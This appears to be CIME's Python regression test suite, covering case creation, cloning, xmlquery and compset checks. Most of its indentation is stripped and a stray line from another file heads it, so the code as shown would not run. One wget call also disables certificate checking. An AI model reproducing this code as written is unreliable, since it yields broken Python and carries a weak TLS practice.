parser.error("-c and -d can't be used with eachother.")
|
scripts_regression_tests.py
|
#!/usr/bin/env python
"""
Script containing CIME python regression test suite. This suite should be run
to confirm overall CIME correctness.
"""
import glob, os, re, shutil, signal, sys, tempfile, \
    threading, time, logging, unittest, getpass, \
    filecmp, atexit
from xml.etree.ElementTree import ParseError
LIB_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),"..","lib")
sys.path.append(LIB_DIR)
# Remove all pyc files to ensure we're testing the right things
import subprocess, argparse
subprocess.call('/bin/rm -f $(find . -name "*.pyc")', shell=True, cwd=LIB_DIR)
import six
from six import assertRaisesRegex
import stat as osstat
import collections
from CIME.utils import run_cmd, run_cmd_no_fail, get_lids, get_current_commit, safe_copy, CIMEError, get_cime_root, expect
import get_tests
import CIME.test_scheduler, CIME.wait_for_tests
from CIME.test_scheduler import TestScheduler
from CIME.XML.compilers import Compilers
from CIME.XML.env_run import EnvRun
from CIME.XML.machines import Machines
from CIME.XML.files import Files
from CIME.case import Case
from CIME.code_checker import check_code, get_all_checkable_files
from CIME.test_status import *
SCRIPT_DIR = CIME.utils.get_scripts_root()
TOOLS_DIR = os.path.join(SCRIPT_DIR,"Tools")
TEST_COMPILER = None
GLOBAL_TIMEOUT = None
TEST_MPILIB = None
MACHINE = None
FAST_ONLY = False
NO_BATCH = False
NO_CMAKE = False
TEST_ROOT = None
NO_TEARDOWN = False
os.environ["CIME_GLOBAL_WALLTIME"] = "0:05:00"
# pragma pylint: disable=protected-access
###############################################################################
def run_cmd_assert_result(test_obj, cmd, from_dir=None, expected_stat=0, env=None, verbose=False):
###############################################################################
from_dir = os.getcwd() if from_dir is None else from_dir
stat, output, errput = run_cmd(cmd, from_dir=from_dir, env=env, verbose=verbose)
if expected_stat == 0:
expectation = "SHOULD HAVE WORKED, INSTEAD GOT STAT %s" % stat
else:
expectation = "EXPECTED STAT %s, INSTEAD GOT STAT %s" % (expected_stat, stat)
msg = \
"""
COMMAND: %s
FROM_DIR: %s
%s
OUTPUT: %s
ERRPUT: %s
""" % (cmd, from_dir, expectation, output, errput)
test_obj.assertEqual(stat, expected_stat, msg=msg)
return output
###############################################################################
def assert_test_status(test_obj, test_name, test_status_obj, test_phase, expected_stat):
###############################################################################
test_status = test_status_obj.get_status(test_phase)
test_obj.assertEqual(test_status, expected_stat, msg="Problem with {}: for phase '{}': has status '{}', expected '{}'".format(test_name, test_phase, test_status, expected_stat))
###############################################################################
def verify_perms(test_obj, root_dir):
###############################################################################
for root, dirs, files in os.walk(root_dir):
for filename in files:
full_path = os.path.join(root, filename)
st = os.stat(full_path)
test_obj.assertTrue(st.st_mode & osstat.S_IWGRP, msg="file {} is not group writeable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IRGRP, msg="file {} is not group readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IROTH, msg="file {} is not world readable".format(full_path))
for dirname in dirs:
full_path = os.path.join(root, dirname)
st = os.stat(full_path)
test_obj.assertTrue(st.st_mode & osstat.S_IWGRP, msg="dir {} is not group writable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IRGRP, msg="dir {} is not group readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IXGRP, msg="dir {} is not group executable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IROTH, msg="dir {} is not world readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IXOTH, msg="dir {} is not world executable".format(full_path))
###############################################################################
class A_RunUnitTests(unittest.TestCase):
###############################################################################
def test_resolve_variable_name(self):
files = Files()
machinefile = files.get_value("MACHINES_SPEC_FILE")
self.assertTrue(os.path.isfile(machinefile),
msg="Path did not resolve to existing file %s" % machinefile)
def test_unittests(self):
# Finds all files contained in CIME/tests or its subdirectories that
# match the pattern 'test*.py', and runs the unit tests found there
# (i.e., tests defined using python's unittest module).
#
# This is analogous to running:
# python -m unittest discover -s CIME/tests -t .
# from cime/scripts/lib
#
# Yes, that means we have a bunch of unit tests run from this one unit
# test.
testsuite = unittest.defaultTestLoader.discover(
start_dir = os.path.join(LIB_DIR,"CIME","tests"),
pattern = 'test*.py',
top_level_dir = LIB_DIR)
testrunner = unittest.TextTestRunner(buffer=False)
# Disable logging; otherwise log messages written by code under test
# clutter the unit test output
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
results = testrunner.run(testsuite)
finally:
logging.getLogger().setLevel(log_lvl)
self.assertTrue(results.wasSuccessful())
def test_lib_doctests(self):
# Find and run all the doctests in the lib directory tree
skip_list = ["six.py", "CIME/SystemTests/mvk.py", "CIME/SystemTests/pgn.py"]
for root, _, files in os.walk(LIB_DIR):
for file_ in files:
filepath = os.path.join(root, file_)[len(LIB_DIR)+1:]
if filepath.endswith(".py") and filepath not in skip_list:
with open(os.path.join(root, file_)) as fd:
content = fd.read()
if '>>>' in content:
print("Running doctests for {}".format(filepath))
run_cmd_assert_result(self, 'PYTHONPATH={}:$PYTHONPATH python -m doctest {} 2>&1'.format(LIB_DIR, filepath), from_dir=LIB_DIR)
else:
print("{} has no doctests".format(filepath))
###############################################################################
def make_fake_teststatus(path, testname, status, phase):
###############################################################################
expect(phase in CORE_PHASES, "Bad phase '%s'" % phase)
with TestStatus(test_dir=path, test_name=testname) as ts:
for core_phase in CORE_PHASES:
if core_phase == phase:
ts.set_status(core_phase, status, comments=("time=42" if phase == RUN_PHASE else ""))
break
else:
ts.set_status(core_phase, TEST_PASS_STATUS, comments=("time=42" if phase == RUN_PHASE else ""))
###############################################################################
def parse_test_status(line):
###############################################################################
regex = re.compile(r"Test '(\w+)' finished with status '(\w+)'")
m = regex.match(line)
return m.groups()
###############################################################################
def kill_subprocesses(name=None, sig=signal.SIGKILL, expected_num_killed=None, tester=None):
###############################################################################
# Kill all subprocesses
proc_ids = CIME.utils.find_proc_id(proc_name=name, children_only=True)
if (expected_num_killed is not None):
tester.assertEqual(len(proc_ids), expected_num_killed,
msg="Expected to find %d processes to kill, found %d" % (expected_num_killed, len(proc_ids)))
for proc_id in proc_ids:
try:
os.kill(proc_id, sig)
except OSError:
pass
###############################################################################
def kill_python_subprocesses(sig=signal.SIGKILL, expected_num_killed=None, tester=None):
###############################################################################
kill_subprocesses("[Pp]ython", sig, expected_num_killed, tester)
###########################################################################
def assert_dashboard_has_build(tester, build_name, expected_count=1):
###########################################################################
# Do not test E3SM dashboard if model is CESM
if CIME.utils.get_model() == "e3sm":
time.sleep(10) # Give chance for cdash to update
wget_file = tempfile.mktemp()
run_cmd_no_fail("wget https://my.cdash.org/api/v1/index.php?project=ACME_test --no-check-certificate -O %s" % wget_file)
raw_text = open(wget_file, "r").read()
os.remove(wget_file)
num_found = raw_text.count(build_name)
tester.assertEqual(num_found, expected_count,
msg="Dashboard did not have expected num occurances of build name '%s'. Expected %s, found %s" % (build_name, expected_count, num_found))
###############################################################################
def setup_proxy():
###############################################################################
if ("http_proxy" not in os.environ):
proxy = MACHINE.get_value("PROXY")
if (proxy is not None):
os.environ["http_proxy"] = proxy
return True
return False
###############################################################################
class N_TestUnitTest(unittest.TestCase):
###############################################################################
@classmethod
def setUpClass(cls):
cls._do_teardown = []
cls._testroot = os.path.join(TEST_ROOT, 'TestUnitTests')
cls._testdirs = []
def _has_unit_test_support(self):
if TEST_COMPILER is None:
default_compiler = MACHINE.get_default_compiler()
compiler = Compilers(MACHINE, compiler=default_compiler)
else:
compiler = Compilers(MACHINE, compiler=TEST_COMPILER)
attrs = {'MPILIB': 'mpi-serial', 'compile_threaded': 'FALSE'}
pfunit_path = compiler.get_optional_compiler_node("PFUNIT_PATH",
attributes=attrs)
if pfunit_path is None:
return False
else:
return True
def test_a_unit_test(self):
cls = self.__class__
if not self._has_unit_test_support():
self.skipTest("Skipping TestUnitTest - PFUNIT_PATH not found for the default compiler on this machine")
test_dir = os.path.join(cls._testroot,"unit_tester_test")
cls._testdirs.append(test_dir)
os.makedirs(test_dir)
unit_test_tool = os.path.abspath(os.path.join(get_cime_root(),"scripts","fortran_unit_testing","run_tests.py"))
test_spec_dir = os.path.join(os.path.dirname(unit_test_tool),"Examples", "interpolate_1d", "tests")
args = "--build-dir {} --test-spec-dir {}".format(test_dir, test_spec_dir)
args += " --machine {}".format(MACHINE.get_machine_name())
run_cmd_no_fail("{} {}".format(unit_test_tool, args))
cls._do_teardown.append(test_dir)
def test_b_cime_f90_unit_tests(self):
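        """
        Build and run the Fortran unit tests that live in the CIME source tree
        (the test spec dir is the CIME root). Skipped in FAST_ONLY mode.
        """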
cls = self.__class__
if (FAST_ONLY):
self.skipTest("Skipping slow test")
if not self._has_unit_test_support():
self.skipTest("Skipping TestUnitTest - PFUNIT_PATH not found for the default compiler on this machine")
test_dir = os.path.join(cls._testroot,"driver_f90_tests")
cls._testdirs.append(test_dir)
os.makedirs(test_dir)
test_spec_dir = get_cime_root()
unit_test_tool = os.path.abspath(os.path.join(test_spec_dir,"scripts","fortran_unit_testing","run_tests.py"))
args = "--build-dir {} --test-spec-dir {}".format(test_dir, test_spec_dir)
args += " --machine {}".format(MACHINE.get_machine_name())
run_cmd_no_fail("{} {}".format(unit_test_tool, args))
cls._do_teardown.append(test_dir)
@classmethod
def tearDownClass(cls):
do_teardown = len(cls._do_teardown) > 0 and sys.exc_info() == (None, None, None) and not NO_TEARDOWN
teardown_root = True
for tfile in cls._testdirs:
if tfile not in cls._do_teardown:
                print("Detected failed test or user requested no teardown")
                print("Leaving case directory: %s" % tfile)
teardown_root = False
elif do_teardown:
shutil.rmtree(tfile)
if teardown_root and do_teardown:
shutil.rmtree(cls._testroot)
###############################################################################
class J_TestCreateNewcase(unittest.TestCase):
###############################################################################
@classmethod
def setUpClass(cls):
cls._testdirs = []
cls._do_teardown = []
cls._testroot = os.path.join(TEST_ROOT, 'TestCreateNewcase')
def test_a_createnewcase(self):
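        """
        Create, set up and build a basic X-compset case, then exercise the
        locked-file handling: changing NTASKS_ATM requires a case.setup --reset
        before case.build succeeds again, while changing CHARGE_ACCOUNT does
        not. Also checks that set_value outside a context manager and read_xml
        with pending changes both raise CIMEError.
        """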
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase')
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --case %s --compset X --output-root %s --handle-preexisting-dirs=r " % (testdir, cls._testroot)
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
cls._testdirs.append(testdir)
run_cmd_assert_result(self, "./create_newcase %s"%(args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
with Case(testdir, read_only=False) as case:
ntasks = case.get_value("NTASKS_ATM")
case.set_value("NTASKS_ATM", ntasks+1)
# this should fail with a locked file issue
run_cmd_assert_result(self, "./case.build",
from_dir=testdir, expected_stat=1)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
with Case(testdir, read_only=False) as case:
case.set_value("CHARGE_ACCOUNT", "fred")
# this should not fail with a locked file issue
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
run_cmd_assert_result(self, "./case.st_archive --test-all", from_dir=testdir)
# Trying to set values outside of context manager should fail
case = Case(testdir, read_only=False)
with self.assertRaises(CIMEError):
case.set_value("NTASKS_ATM", 42)
# Trying to read_xml with pending changes should fail
with self.assertRaises(CIMEError):
with Case(testdir, read_only=False) as case:
case.set_value("CHARGE_ACCOUNT", "fouc")
case.read_xml()
cls._do_teardown.append(testdir)
def test_aa_no_flush_on_instantiate(self):
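        """
        Verify that instantiating a Case does not mark any env file as needing
        a rewrite, and that set_value only dirties the file that owns the
        changed variable (and only when the value actually changes).
        """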
testdir = os.path.join(self.__class__._testroot, 'testcreatenewcase')
with Case(testdir, read_only=False) as case:
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Instantiating a case should not trigger a flush call")
with Case(testdir, read_only=False) as case:
case.set_value("HIST_OPTION","nyears")
runfile = case.get_env('run')
self.assertTrue(runfile.needsrewrite, msg="Expected flush call not triggered")
for env_file in case._files:
if env_file != runfile:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
# Flush the file
runfile.write()
# set it again to the same value
case.set_value("HIST_OPTION","nyears")
# now the file should not need to be flushed
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
# Check once more with a new instance
with Case(testdir, read_only=False) as case:
case.set_value("HIST_OPTION","nyears")
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
def test_b_user_mods(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testusermods')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
user_mods_dir = os.path.join(CIME.utils.get_python_libs_root(), "..", "tests", "user_mods_test1")
args = " --case %s --compset X --user-mods-dir %s --output-root %s --handle-preexisting-dirs=r"% (testdir, user_mods_dir, cls._testroot)
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "%s/create_newcase %s "
% (SCRIPT_DIR, args),from_dir=SCRIPT_DIR)
self.assertTrue(os.path.isfile(os.path.join(testdir,"SourceMods","src.drv","somefile.F90")), msg="User_mods SourceMod missing")
with open(os.path.join(testdir,"user_nl_cpl"),"r") as fd:
contents = fd.read()
self.assertTrue("a different cpl test option" in contents, msg="User_mods contents of user_nl_cpl missing")
self.assertTrue("a cpl namelist option" in contents, msg="User_mods contents of user_nl_cpl missing")
cls._do_teardown.append(testdir)
def test_c_create_clone_keepexe(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_keepexe')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
user_mods_dir = os.path.join(CIME.utils.get_python_libs_root(), "..", "tests", "user_mods_test3")
cmd = "%s/create_clone --clone %s --case %s --keepexe --user-mods-dir %s" \
% (SCRIPT_DIR, prevtestdir, testdir, user_mods_dir)
run_cmd_assert_result(self, cmd, from_dir=SCRIPT_DIR, expected_stat=1)
cls._do_teardown.append(testdir)
def test_d_create_clone_new_user(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_new_user')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
cls._testdirs.append(testdir)
# change the USER and CIME_OUTPUT_ROOT to nonsense values
# this is intended as a test of whether create_clone is independent of user
run_cmd_assert_result(self, "./xmlchange USER=this_is_not_a_user",
from_dir=prevtestdir)
fakeoutputroot = cls._testroot.replace(os.environ.get("USER"), "this_is_not_a_user")
run_cmd_assert_result(self, "./xmlchange CIME_OUTPUT_ROOT=%s"%fakeoutputroot,
from_dir=prevtestdir)
# this test should pass (user name is replaced)
run_cmd_assert_result(self, "%s/create_clone --clone %s --case %s " %
(SCRIPT_DIR, prevtestdir, testdir),from_dir=SCRIPT_DIR)
shutil.rmtree(testdir)
# this test should pass
run_cmd_assert_result(self, "%s/create_clone --clone %s --case %s --cime-output-root %s" %
(SCRIPT_DIR, prevtestdir, testdir, cls._testroot),from_dir=SCRIPT_DIR)
cls._do_teardown.append(testdir)
def test_dd_create_clone_not_writable(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_not_writable')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
cls._testdirs.append(testdir)
with Case(prevtestdir, read_only=False) as case1:
case2 = case1.create_clone(testdir)
with self.assertRaises(CIMEError):
case2.set_value("CHARGE_ACCOUNT", "fouc")
cls._do_teardown.append(testdir)
def test_e_xmlquery(self):
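        """
        Exercise the xmlquery command-line tool against the first test case:
        scalar values, per-component NTASKS, subgroup queries, --listall, and
        the error message for the undefined variable DOCN_MODE.
        """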
# Set script and script path
xmlquery = "./xmlquery"
cls = self.__class__
casedir = cls._testdirs[0]
# Check for environment
self.assertTrue(os.path.isdir(SCRIPT_DIR))
self.assertTrue(os.path.isdir(TOOLS_DIR))
self.assertTrue(os.path.isfile(os.path.join(casedir,xmlquery)))
# Test command line options
with Case(casedir, read_only=True) as case:
STOP_N = case.get_value("STOP_N")
COMP_CLASSES = case.get_values("COMP_CLASSES")
BUILD_COMPLETE = case.get_value("BUILD_COMPLETE")
cmd = xmlquery + " STOP_N --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(STOP_N), msg="%s != %s"%(output, STOP_N))
cmd = xmlquery + " BUILD_COMPLETE --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == "TRUE", msg="%s != %s"%(output, BUILD_COMPLETE))
# we expect DOCN_MODE to be undefined in this X compset
            # this test ensures that we do not try to resolve this as a compvar
cmd = xmlquery + " DOCN_MODE --value"
_, output, error = run_cmd(cmd, from_dir=casedir)
self.assertTrue(error == "ERROR: No results found for variable DOCN_MODE",
msg="unexpected result for DOCN_MODE, output {}, error {}".
format(output, error))
for comp in COMP_CLASSES:
caseresult = case.get_value("NTASKS_%s"%comp)
cmd = xmlquery + " NTASKS_%s --value"%comp
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(caseresult), msg="%s != %s"%(output, caseresult))
cmd = xmlquery + " NTASKS --subgroup %s --value"%comp
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(caseresult), msg="%s != %s"%(output, caseresult))
if MACHINE.has_batch_system():
JOB_QUEUE = case.get_value("JOB_QUEUE", subgroup="case.run")
cmd = xmlquery + " JOB_QUEUE --subgroup case.run --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == JOB_QUEUE, msg="%s != %s"%(output, JOB_QUEUE))
cmd = xmlquery + " --listall"
run_cmd_no_fail(cmd, from_dir=casedir)
cls._do_teardown.append(cls._testroot)
def test_f_createnewcase_with_user_compset(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase_with_user_compset')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
pesfile = os.path.join("..","src","drivers","mct","cime_config","config_pes.xml")
args = "--case %s --compset 2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV --pesfile %s --res f19_g16 --output-root %s --handle-preexisting-dirs=r" % (testdir, pesfile, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "%s/create_newcase %s"%(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
cls._do_teardown.append(testdir)
def test_g_createnewcase_with_user_compset_and_env_mach_pes(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase_with_user_compset_and_env_mach_pes')
if os.path.exists(testdir):
shutil.rmtree(testdir)
previous_testdir = cls._testdirs[-1]
cls._testdirs.append(testdir)
pesfile = os.path.join(previous_testdir,"env_mach_pes.xml")
args = "--case %s --compset 2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV --pesfile %s --res f19_g16 --output-root %s --handle-preexisting-dirs=r" % (testdir, pesfile, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "%s/create_newcase %s"%(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "diff env_mach_pes.xml %s"%(previous_testdir), from_dir=testdir)
# this line should cause the diff to fail (I assume no machine is going to default to 17 tasks)
run_cmd_assert_result(self, "./xmlchange NTASKS=17", from_dir=testdir)
run_cmd_assert_result(self, "diff env_mach_pes.xml %s"%(previous_testdir), from_dir=testdir,
expected_stat=1)
cls._do_teardown.append(testdir)
def test_h_primary_component(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testprimarycomponent')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
args = " --case CreateNewcaseTest --script-root %s --compset X --output-root %s --handle-preexisting-dirs u" % (testdir, cls._testroot)
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "%s/create_newcase %s" % (SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
with Case(testdir, read_only=False) as case:
case._compsetname = case.get_value("COMPSET")
case.set_comp_classes(case.get_values("COMP_CLASSES"))
primary = case._find_primary_component()
self.assertEqual(primary, "drv", msg="primary component test expected drv but got %s"%primary)
# now we are going to corrupt the case so that we can do more primary_component testing
case.set_valid_values("COMP_GLC","%s,fred"%case.get_value("COMP_GLC"))
case.set_value("COMP_GLC","fred")
primary = case._find_primary_component()
self.assertEqual(primary, "fred", msg="primary component test expected fred but got %s"%primary)
case.set_valid_values("COMP_ICE","%s,wilma"%case.get_value("COMP_ICE"))
case.set_value("COMP_ICE","wilma")
primary = case._find_primary_component()
self.assertEqual(primary, "wilma", msg="primary component test expected wilma but got %s"%primary)
case.set_valid_values("COMP_OCN","%s,bambam,docn"%case.get_value("COMP_OCN"))
case.set_value("COMP_OCN","bambam")
primary = case._find_primary_component()
self.assertEqual(primary, "bambam", msg="primary component test expected bambam but got %s"%primary)
case.set_valid_values("COMP_LND","%s,barney"%case.get_value("COMP_LND"))
case.set_value("COMP_LND","barney")
primary = case._find_primary_component()
# This is a "J" compset
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
case.set_value("COMP_OCN","docn")
case.set_valid_values("COMP_LND","%s,barney"%case.get_value("COMP_LND"))
case.set_value("COMP_LND","barney")
primary = case._find_primary_component()
self.assertEqual(primary, "barney", msg="primary component test expected barney but got %s"%primary)
case.set_valid_values("COMP_ATM","%s,wilma"%case.get_value("COMP_ATM"))
case.set_value("COMP_ATM","wilma")
primary = case._find_primary_component()
self.assertEqual(primary, "wilma", msg="primary component test expected wilma but got %s"%primary)
            # this is an "E" compset
case._compsetname = case._compsetname.replace("XOCN","DOCN%SOM")
primary = case._find_primary_component()
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
# finally a "B" compset
case.set_value("COMP_OCN","bambam")
primary = case._find_primary_component()
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
cls._do_teardown.append(testdir)
def test_j_createnewcase_user_compset_vs_alias(self):
"""
Create a compset using the alias and another compset using the full compset name
and make sure they are the same by comparing the namelist files in CaseDocs.
Ignore the modelio files and clean the directory names out first.
"""
cls = self.__class__
testdir1 = os.path.join(cls._testroot, 'testcreatenewcase_user_compset')
if os.path.exists(testdir1):
shutil.rmtree(testdir1)
cls._testdirs.append(testdir1)
args = ' --case CreateNewcaseTest --script-root {} --compset 2000_DATM%NYF_SLND_SICE_DOCN%SOMAQP_SROF_SGLC_SWAV --res f19_g16 --output-root {} --handle-preexisting-dirs u' .format(testdir1, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "{}/create_newcase {}" .format (SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup ", from_dir=testdir1)
run_cmd_assert_result(self, "./preview_namelists ", from_dir=testdir1)
dir1 = os.path.join(testdir1,"CaseDocs")
dir2 = os.path.join(testdir1,"CleanCaseDocs")
os.mkdir(dir2)
for _file in os.listdir(dir1):
if "modelio" in _file:
continue
with open(os.path.join(dir1,_file),"r") as fi:
file_text = fi.read()
file_text = file_text.replace(os.path.basename(testdir1),"PATH")
file_text = re.sub(r"logfile =.*","",file_text)
with open(os.path.join(dir2,_file), "w") as fo:
fo.write(file_text)
cleancasedocs1 = dir2
testdir2 = os.path.join(cls._testroot, 'testcreatenewcase_alias_compset')
if os.path.exists(testdir2):
shutil.rmtree(testdir2)
cls._testdirs.append(testdir2)
args = ' --case CreateNewcaseTest --script-root {} --compset ADSOMAQP --res f19_g16 --output-root {} --handle-preexisting-dirs u'.format(testdir2, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "{}/create_newcase {}".format(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup ", from_dir=testdir2)
run_cmd_assert_result(self, "./preview_namelists ", from_dir=testdir2)
dir1 = os.path.join(testdir2,"CaseDocs")
dir2 = os.path.join(testdir2,"CleanCaseDocs")
os.mkdir(dir2)
for _file in os.listdir(dir1):
if "modelio" in _file:
continue
with open(os.path.join(dir1,_file),"r") as fi:
file_text = fi.read()
file_text = file_text.replace(os.path.basename(testdir2),"PATH")
file_text = re.sub(r"logfile =.*","",file_text)
with open(os.path.join(dir2,_file), "w") as fo:
fo.write(file_text)
cleancasedocs2 = dir2
dcmp = filecmp.dircmp(cleancasedocs1, cleancasedocs2)
self.assertTrue(len(dcmp.diff_files) == 0, "CaseDocs differ {}".format(dcmp.diff_files))
cls._do_teardown.append(testdir1)
cls._do_teardown.append(testdir2)
def test_k_append_config(self):
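        """
        Read the config_machines_template.xml schema file into the MACHINE
        object and verify that exactly one machine ("mymachine") is appended
        to the list of available machines.
        """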
machlist_before = MACHINE.list_available_machines()
        self.assertTrue(len(machlist_before) > 1, msg="Problem reading machine list")
newmachfile = os.path.join(get_cime_root(),"config",
"xml_schemas","config_machines_template.xml")
MACHINE.read(newmachfile)
machlist_after = MACHINE.list_available_machines()
self.assertEqual(len(machlist_after)-len(machlist_before), 1, msg="Not able to append config_machines.xml {} {}".format(len(machlist_after), len(machlist_before)))
        self.assertIn("mymachine", machlist_after, msg="Not able to append config_machines.xml")
def test_m_createnewcase_alternate_drivers(self):
# Test that case.setup runs for nuopc and moab drivers
cls = self.__class__
model = CIME.utils.get_model()
for driver in ("nuopc", "moab"):
if not os.path.exists(os.path.join(get_cime_root(),"src","drivers",driver)):
self.skipTest("Skipping driver test for {}, driver not found".format(driver))
if ((model == 'cesm' and driver == 'moab') or
(model == 'e3sm' and driver == 'nuopc')):
continue
testdir = os.path.join(cls._testroot, 'testcreatenewcase.{}'.format( driver))
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --driver {} --case {} --compset X --res f19_g16 --output-root {} --handle-preexisting-dirs=r".format(driver, testdir, cls._testroot)
if model == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
cls._testdirs.append(testdir)
run_cmd_assert_result(self, "./create_newcase %s"%(args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
with Case(testdir, read_only=False) as case:
comp_interface = case.get_value("COMP_INTERFACE")
self.assertTrue(driver == comp_interface, msg="%s != %s"%(driver, comp_interface))
cls._do_teardown.append(testdir)
def test_n_createnewcase_bad_compset(self):
cls = self.__class__
model = CIME.utils.get_model()
testdir = os.path.join(cls._testroot, 'testcreatenewcase_bad_compset')
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --case %s --compset InvalidCompsetName --output-root %s --handle-preexisting-dirs=r " % (testdir, cls._testroot)
if model == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "./create_newcase %s"%(args),
from_dir=SCRIPT_DIR, expected_stat=1)
self.assertFalse(os.path.exists(testdir))
@classmethod
def tearDownClass(cls):
do_teardown = len(cls._do_teardown) > 0 and sys.exc_info() == (None, None, None) and not NO_TEARDOWN
rmtestroot = True
for tfile in cls._testdirs:
if tfile not in cls._do_teardown:
                print("Detected failed test or user requested no teardown")
                print("Leaving case directory: %s" % tfile)
rmtestroot = False
elif do_teardown:
try:
                    print("Attempt to remove directory {}".format(tfile))
shutil.rmtree(tfile)
except BaseException:
print("Could not remove directory {}".format(tfile))
if rmtestroot:
shutil.rmtree(cls._testroot)
###############################################################################
class M_TestWaitForTests(unittest.TestCase):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
self._testroot = os.path.join(TEST_ROOT,"TestWaitForTests")
